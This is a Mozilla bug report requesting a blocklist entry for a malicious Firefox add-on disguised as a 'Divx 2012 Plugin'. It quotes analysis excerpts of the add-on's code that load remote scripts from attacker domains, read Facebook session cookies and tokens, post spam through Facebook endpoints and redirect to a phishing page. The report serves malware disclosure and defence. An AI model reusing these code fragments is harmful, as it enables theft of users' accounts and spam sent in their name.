Closed Bug 728108 Opened 13 years ago Closed 13 years ago

Malicious "Divx 2012 Plugin" add-on

Categories

(Toolkit :: Blocklist Policy Requests, defect)

defect
Not set
normal

Tracking

()

RESOLVED DUPLICATE of bug 723792

People

(Reporter: mhammell, Unassigned)

Details

Attachments

(1 file)

36.92 KB, application/octet-stream
Details
Attached file wambam.info.output.zip
User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_2) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.46 Safari/535.11 Steps to reproduce: Downloaded add-on from http://wambam[.]info/plugin/youtubefix.xpi Actual results: ** Embedded and Remote Files ** chrome.manifest content/prefman.js content/skin/icon.png content/script-compiler.js content/youtube.js http://wambam.info/plugin/script1.js http://webiapps.info/ultra.js http://webiapps.info/you.js content/xmlhttprequester.js content/script-compiler-overlay.xul http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul install.rdf ** Embedded Metadata ** <em:name>Divx 2012 Plugin</em:name> <em:version>9.4.0</em:version> <em:targetApplication> <em:minVersion>2.0</em:minVersion> <em:maxVersion>10.*</em:maxVersion> </em:targetApplication> <em:creator>YOU</em:creator> <em:iconURL>chrome://youtube/content/skin/icon.png</em:iconURL> <em:description>video plugin</em:description> <em:homepageURL>http://youtube3.com/</em:homepageURL> <em:updateURL>http://brownizze.info/test/update.rdf</em:updateURL> ...<em:updateKey>MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDCUtKPOGhnhlxo7vRoSR0YC1g/Mo... ** Files Loaded ** ...overlay chrome://browser/content/browser.xul chrome://youtube/content/script-com... 'chrome://youtube/content/youtube.js' ...pt type='application/x-javascript' src='chrome://youtube/content/youtube.js'></s... <em:iconURL>chrome://youtube/content/skin/icon.png</em:iconURL> ** Remote Javascript Loaded ** ...nt/browser.xul chrome://youtube/content/script-compiler-overlay.xul var scriptableStream=Components .classes["@mozilla.org/scriptableinputstream;1"] .getService(Components.interfaces.nsIScriptableInputStream); .classes["@mozilla.org/intl/scriptableunicodeconverter"] .createInstance(Components.interfaces.nsIScriptableUnicodeConverter); scriptableStream.init(input); var str=scriptableStream.read(input.available()); scriptableStream.close(); var script=youtube_gmCompiler.getUrlContents( youtube_gmCompiler.injectScript(script, href, unsafeWin); injectScript: function(script, url, unsafeContentWin) { var sandbox, script, logger, storage, xmlhttpRequester; var storage=new youtube_ScriptStorage(); "(function(){"+script+"})()", e2.fileName=script.filename; function youtube_ScriptStorage() { youtube_ScriptStorage.prototype.setValue = function(name, val) { youtube_ScriptStorage.prototype.getValue = function(name, defVal) { loadScript_you(); function loadScript_you() { var s = document.createElement('script'); s.setAttribute("type","text/javascript"); s.setAttribute("src", "http://wambam.info/plugin/script1.js"); function addScript() { var s = document.createElement('script'); s.setAttribute("type", "text/javascript"); s.setAttribute("src", "http://webiapps.info/ultra.js"); function addScript(src) { var s = document.createElement('script'); s.setAttribute("type", "text/javascript"); var a = document.getElementsByTagName('script')[0]; addScript("http://webiapps.info/you.js"); var a = document.getElementsByTagName('script')[0]; addScript(); // this function gets called by user scripts in content security scope to ...eymaster/gatekeeper/there.is.only.xul'><script type='application/x-javascript' s... <Description about="urn:mozilla:install-manifest"> <Description> </Description> <em:description>video plugin</em:description> </Description> ** Facebook Paths Accessed ** //blogs[1] = 'http://apps.facebook.com/saionsaasdim/?'; //blogs[0] = 'http://apps.facebook.com/ouyturhfgfd/?'; //blogs[2] = 'http://apps.facebook.com/tyurtessds/?'; ...c['open']('GET', 'http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1&... var d = 'http://www.facebook.com/ajax/connect/external_edge_comment.php?__a=1'; var d = 'http://www.facebook.com/ajax/connect/external_node_connect.php?__a=1'; if (location.href.match(/^http:\/\/(www\.)?facebook.com/i)) { ** Facebook Cookies Accessed ** var fb_dtsg = Env.fb_dtsg; user_id = readCookie('c_user'); ...d + '&post_form_id=' + post_form_id + '&fb_dtsg=' + fb_dtsg + '&lsd' + '&post_fo... var fb_dtsg = Env.fb_dtsg; ..._widget' + '&nctr[_impid]=' + impid + '&fb_dtsg=' + fb_dtsg + '&lsd' + '&post_fo... user_id = readCookie('c_user'); ** HTTP Requests ** var c = new XMLHttpRequest(); ...c['open']('GET', 'http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1&... c['open']('POST', d, true); var c = new XMLHttpRequest(); c['open']('POST', d, true); var req = new this.chromeWindow.XMLHttpRequest(); ** All URLs Loaded or Mentioned ** // http://www.letitblog.com/code/python/greasemonkey.py.txt // http://greasemonkey.devjavu.com/ change[i].src="http://webiapps.info/watch.php"; ifra.src="http://webiapps.info/watch.php" ...L='<iframe id="change" width="500" src="http://webiapps.info/watch.php" height="... //blogs[0] = 'http://02939sdnasonsd.blogspot.com/?'; //blogs[1] = 'http://apps.facebook.com/saionsaasdim/?'; //blogs[0] = 'http://apps.facebook.com/ouyturhfgfd/?'; //blogs[2] = 'http://apps.facebook.com/tyurtessds/?'; ...c['open']('GET', 'http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1&... var d = 'http://www.facebook.com/ajax/connect/external_edge_comment.php?__a=1'; var d = 'http://www.facebook.com/ajax/connect/external_node_connect.php?__a=1'; ... '<center><br><br><br><br><br><img src="http://i.imgur.com/4BDZc.gif" /><br />Pl... ...setTimeout('top.location=\'http://seehowtorestoreyouracc.blogspot.com/?accounts\... addScript("http://webiapps.info/you.js"); s.setAttribute("src", "http://webiapps.info/ultra.js"); s.setAttribute("src", "http://wambam.info/plugin/script1.js"); ...<dd><code>http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul</code></... ...<dd><a href="https://developer.mozilla.org/en/XUL">https://developer.mozilla.org/... ...<?xml version="1.0"?><overlay xmlns='http://www.mozilla.org/keymaster/gatekeeper... <RDF xmlns="http://www.w3.org/1999/02/22-rdf-syntax-ns#" xmlns:em="http://www.mozilla.org/2004/em-rdf#"> <em:homepageURL>http://youtube3.com/</em:homepageURL> <em:updateURL>http://brownizze.info/test/update.rdf</em:updateURL> The associated zip file contains http://wambam.info/plugin/youtubefix.xpi and all of the remote javascript files. Expected results: It shouldn't steal your Facebook cookies and spam your friends with out your consent.
Same id as bug 723792.
Status: UNCONFIRMED → RESOLVED
Closed: 13 years ago
Resolution: --- → DUPLICATE
Product: addons.mozilla.org → Toolkit
You need to log in before you can comment on or make changes to this bug.

Attachment

General

Creator:
Created:
Updated:
Size: